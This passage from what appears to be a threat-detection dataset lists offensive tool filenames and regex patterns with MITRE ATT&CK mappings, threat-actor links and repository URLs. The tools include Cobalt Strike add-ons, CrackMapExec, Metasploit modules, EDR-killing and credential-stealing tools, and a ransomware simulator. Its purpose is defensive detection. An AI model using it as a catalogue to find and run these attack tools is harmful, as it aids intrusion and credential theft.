- APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","486","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" "*/Privileger.git*",".{0,1000}\/Privileger\.git.{0,1000}","offensive_tool_keyword","Privileger","Privileger is a tool to work with Windows Privileges","T1548.002","TA0004 ","N/A","N/A","Privilege Escalation","https://github.com/MzHmO/Privileger","1","1","N/A","8","2","131","28","2023-02-07T07:28:40Z","2023-01-31T11:24:37Z" "*/PrivKit.git*",".{0,1000}\/PrivKit\.git.{0,1000}","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","1","N/A","9","4","330","38","2023-03-23T09:50:09Z","2023-03-20T04:19:40Z" "*/PrivKit/*",".{0,1000}\/PrivKit\/.{0,1000}","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","1","N/A","9","4","330","38","2023-03-23T09:50:09Z","2023-03-20T04:19:40Z" "*/proberbyte.go*",".{0,1000}\/proberbyte\.go.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1502","215","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" "*/procdump.py*",".{0,1000}\/procdump\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/process_herpaderping/*",".{0,1000}\/process_herpaderping\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/process_killer.cpp*",".{0,1000}\/process_killer\.cpp.{0,1000}","offensive_tool_keyword","mhydeath","Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.","T1562.001","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/zer0condition/mhydeath","1","1","N/A","10","4","345","63","2023-08-22T08:01:04Z","2023-08-22T07:15:36Z" "*/processinjection.exe*",".{0,1000}\/processinjection\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*/Process-Instrumentation-Syscall-Hook*",".{0,1000}\/Process\-Instrumentation\-Syscall\-Hook.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*/ProduKey.exe*",".{0,1000}\/ProduKey\.exe.{0,1000}","offensive_tool_keyword","produkey","ProduKey is a small utility that displays the ProductID and the CD-Key of Microsoft Office (Microsoft Office 2003. Microsoft Office 2007). Windows (Including Windows 8/7/Vista). Exchange Server. and SQL Server installed on your computer. You can view this information for your current running operating system. or for another operating system/computer - by using command-line options. This utility can be useful if you lost the product key of your Windows/Office. and you want to reinstall it on your computer.","T1003.001 - T1003.002 - T1012 - T1057 - T1518","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/product_cd_key_viewer.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/prometheus.exe",".{0,1000}\/prometheus\.exe","offensive_tool_keyword","prometheus","malware C2","T1071 - T1071.001 - T1105 - T1105.002 - T1106 - T1574.002","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/paranoidninja/0xdarkvortex-MalwareDevelopment","1","1","N/A","10","10","186","65","2020-07-21T06:14:44Z","2018-09-04T15:38:53Z" "*/protocols/ftp.py*",".{0,1000}\/protocols\/ftp\.py.{0,1000}","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*/protocols/ldap.py*",".{0,1000}\/protocols\/ldap\.py.{0,1000}","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*/protocols/mssql.py*",".{0,1000}\/protocols\/mssql\.py.{0,1000}","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*/protocols/rdp.py*",".{0,1000}\/protocols\/rdp\.py.{0,1000}","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*/protocols/rdp.py*",".{0,1000}\/protocols\/rdp\.py.{0,1000}","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted ","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*/protocols/smb.py*",".{0,1000}\/protocols\/smb\.py.{0,1000}","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*/protocols/ssh.py*",".{0,1000}\/protocols\/ssh\.py.{0,1000}","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*/proxy/Tor.py*",".{0,1000}\/proxy\/Tor\.py.{0,1000}","offensive_tool_keyword","Tor","Tor is a python based module for using tor proxy/network services on windows - osx - linux with just one click.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Defense Evasion - Data Exfiltration","https://github.com/r0oth3x49/Tor","1","1","N/A","N/A","2","147","39","2018-04-21T10:55:00Z","2016-09-22T11:22:33Z" "*/proxy/tor_paths.py*",".{0,1000}\/proxy\/tor_paths\.py.{0,1000}","offensive_tool_keyword","Tor","Tor is a python based module for using tor proxy/network services on windows - osx - linux with just one click.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Defense Evasion - Data Exfiltration","https://github.com/r0oth3x49/Tor","1","1","N/A","N/A","2","147","39","2018-04-21T10:55:00Z","2016-09-22T11:22:33Z" "*/Proxy_Def_File_Generator.cna*",".{0,1000}\/Proxy_Def_File_Generator\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","DLL Hijack Search Order Enumeration BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/DLL-Hijack-Search-Order-BOF","1","1","N/A","10","10","129","21","2021-11-03T17:39:32Z","2021-11-02T03:47:31Z" "*/proxychains-*.zip*",".{0,1000}\/proxychains\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027","TA0001 - TA0042","N/A","N/A","Exploitation tools","https://github.com/haad/proxychains","1","1","N/A","8","10","6069","591","2024-01-02T11:23:26Z","2011-02-25T12:27:05Z" "*/proxychains.conf*",".{0,1000}\/proxychains\.conf.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027","TA0001 - TA0042","N/A","N/A","Exploitation tools","https://github.com/haad/proxychains","1","0","N/A","8","10","6069","591","2024-01-02T11:23:26Z","2011-02-25T12:27:05Z" "*/proxychains.git*",".{0,1000}\/proxychains\.git.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027","TA0001 - TA0042","N/A","N/A","Exploitation tools","https://github.com/haad/proxychains","1","1","N/A","8","10","6069","591","2024-01-02T11:23:26Z","2011-02-25T12:27:05Z" "*/proxymaybeshell*",".{0,1000}\/proxymaybeshell.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/ps_windows.go*",".{0,1000}\/ps_windows\.go.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*/ps1_oneliner.py*",".{0,1000}\/ps1_oneliner\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*/PS2EXE.git*",".{0,1000}\/PS2EXE\.git.{0,1000}","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/MScholtes/PS2EXE","1","1","N/A","N/A","10","1051","184","2023-12-17T09:37:50Z","2019-11-08T09:25:02Z" "*/ps2exe.ps1*",".{0,1000}\/ps2exe\.ps1.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*/PS2EXE/*",".{0,1000}\/PS2EXE\/.{0,1000}","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/MScholtes/PS2EXE","1","1","N/A","N/A","10","1051","184","2023-12-17T09:37:50Z","2019-11-08T09:25:02Z" "*/ps-empire*",".{0,1000}\/ps\-empire.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*/psexec.json*",".{0,1000}\/psexec\.json.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/psgetsys.ps1*",".{0,1000}\/psgetsys\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*/psgetsys.ps1*",".{0,1000}\/psgetsys\.ps1.{0,1000}","offensive_tool_keyword","psgetsystem","getsystem via parent process using ps1 & embeded c#","T1134 - T1548","TA0004","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/psgetsystem","1","1","N/A","10","4","320","83","2023-10-26T07:13:08Z","2018-02-02T11:28:22Z" "*/psgetsystem.git*",".{0,1000}\/psgetsystem\.git.{0,1000}","offensive_tool_keyword","psgetsystem","getsystem via parent process using ps1 & embeded c#","T1134 - T1548","TA0004","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/psgetsystem","1","1","N/A","10","4","320","83","2023-10-26T07:13:08Z","2018-02-02T11:28:22Z" "*/PSLessExec.exe*",".{0,1000}\/PSLessExec\.exe.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","1","N/A","8","10","N/A","N/A","N/A","N/A" "*/PsMapExec.git*",".{0,1000}\/PsMapExec\.git.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","1","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*/PsMapExec/*",".{0,1000}\/PsMapExec\/.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","1","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*/psnuffle*",".{0,1000}\/psnuffle.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/PSpersist.git*",".{0,1000}\/PSpersist\.git.{0,1000}","offensive_tool_keyword","Pspersist","Dropping a powershell script at %HOMEPATH%\Documents\windowspowershell\ that contains the implant's path and whenever powershell process is created the implant will executed too.","T1546 - T1546.013 - T1053 - T1053.005 - T1037 - T1037.001","TA0003","N/A","N/A","Persistence","https://github.com/TheD1rkMtr/Pspersist","1","1","N/A","10","1","83","21","2023-08-02T02:27:29Z","2023-02-01T17:21:38Z" "*/pspy -*",".{0,1000}\/pspy\s\-.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","6","10","4548","484","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" "*/PSPY.dll*",".{0,1000}\/PSPY\.dll.{0,1000}","offensive_tool_keyword","NPPSpy","Simple code for NPLogonNotify(). The function obtains logon data including cleartext password","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy","1","1","N/A","10","10","2977","500","2024-04-26T20:31:04Z","2019-06-29T13:22:36Z" "*/pspy.git*",".{0,1000}\/pspy\.git.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","1","N/A","6","10","4548","484","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" "*/pspy.git*",".{0,1000}\/pspy\.git.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1082 - T1518.001","TA0007","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","1","N/A","8","10","4548","484","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" "*/pspy.go*",".{0,1000}\/pspy\.go.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","6","10","4548","484","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" "*/pspy/cmd*",".{0,1000}\/pspy\/cmd.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","6","10","4548","484","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" "*/pspy/cmd/*",".{0,1000}\/pspy\/cmd\/.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1082 - T1518.001","TA0007","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","8","10","4548","484","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" "*/pspy/pspy.go*",".{0,1000}\/pspy\/pspy\.go.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1082 - T1518.001","TA0007","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","1","N/A","8","10","4548","484","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" "*/pspy32*",".{0,1000}\/pspy32.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","1","N/A","6","10","4548","484","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" "*/pspy64*",".{0,1000}\/pspy64.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","1","N/A","6","10","4548","484","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" "*/PSRansom -*",".{0,1000}\/PSRansom\s\-.{0,1000}","offensive_tool_keyword","PSRansom","PSRansom is a PowerShell Ransomware Simulator with C2 Server capabilities. This tool helps you simulate encryption process of a generic ransomware in any system on any system with PowerShell installed on it. Thanks to the integrated C2 server. you can exfiltrate files and 